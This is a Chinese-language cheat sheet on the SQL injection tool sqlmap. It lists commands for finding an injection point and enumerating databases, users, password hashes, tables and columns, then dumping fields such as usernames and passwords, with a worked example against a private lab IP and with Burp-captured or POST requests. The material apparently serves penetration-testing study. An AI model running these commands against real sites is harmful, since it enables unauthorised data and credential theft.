sqlmap的用法

sqlmap的⽤法
sqlmap注⼊⼤致流程
1、安装python并环境配置，检验
2、安装sqlmap，将sqlmap⽂件复制到python⽂件中
3、在cmd中cd 到sqlmap⽂件路径
4、输⼊python sqlmap.py -u "注⼊点"
5、后续注⼊参考以下⽤法
语法
1、sqlmap⽤法（get类型sqlmap注⼊）
sqlmap.py -u 'url' # 检测注⼊点是否可⽤
sqlmap.py -u 'url'--dbs #可曝出该mysql中所有数据库名称
sqlmap.py -u 'url' --current-db #web当前使⽤的数据库
sqlmap.py -u 'url' --current-user ＃web数据库使⽤账户
sqlmap.py -u 'url' --users ＃列出sql所有⽤户
sqlmap.py -u 'url' --passwords ＃数据库账户与密码
sqlmap.py -u 'url' --tables ＃输出所有的表
sqlmap.py -u 'url' -D 【数据库名】 --tables ＃-D 指定数据库名
sqlmap.py -u 'url' -D 【数据库名】 -T 【表名】 --columns ＃-T：指定要列出字段的表
columns　列出了所有的列字段
sqlmap.py -u 'url' -D 【数据库名】 -T 【表名】 -C"username,realname,password" --dump
＃　-C ：指定要暴的字段
扩充实例
注⼊点：http://192.168.117.135/xxx.php?xxx_id=1
输⼊“python sqlmap.py --version”检查sqlmap是否安装成功
输⼊“python sqlmap.py -hh”， “-hh”参数⽤于查看sqlmap的使⽤说明
输⼊“python sqlmap.py -u 'url'，其中“-u”参数⽤于指定注⼊点的URL。

输⼊“python sqlmap.py –u 'url' --dbs”，其中参数“--dbs”⽤于列举数据库。

输⼊“python sqlmap.py -u 'url'-D jnng --tables”，其中参数“-D”⽤于指定数据库名称，“--tables”参数⽤于列举表。

输⼊“python sqlmap.py -u 'url'-D jnng -T root --columns”，其中参数“-T”⽤于指定表名称，“--columns”参数⽤于指定列出表中字段。

输⼊“python sqlmap.py -u 'url' -D jnng -T root -C root_id,root_name,root_pass --dump”，其中参数“-C”⽤于指定字段名称，参数“—dump”⽤于导出数据。

2、sqlmap万能⽤法
burp抓包保存为1.txt
sqlmap.py -r 1.txt --dbs #可曝出该mysql中所有数据库名称
sqlmap.py -r 1.txt --current-db #web当前使⽤的数据库
3、post类型Sql注⼊
1、可以⽤sql万能⽤法
2、sqlmap.py -u "url" --data "n=值&p=值"（n、p的值指抓包的参数）post类型Sql注⼊具体可参考：。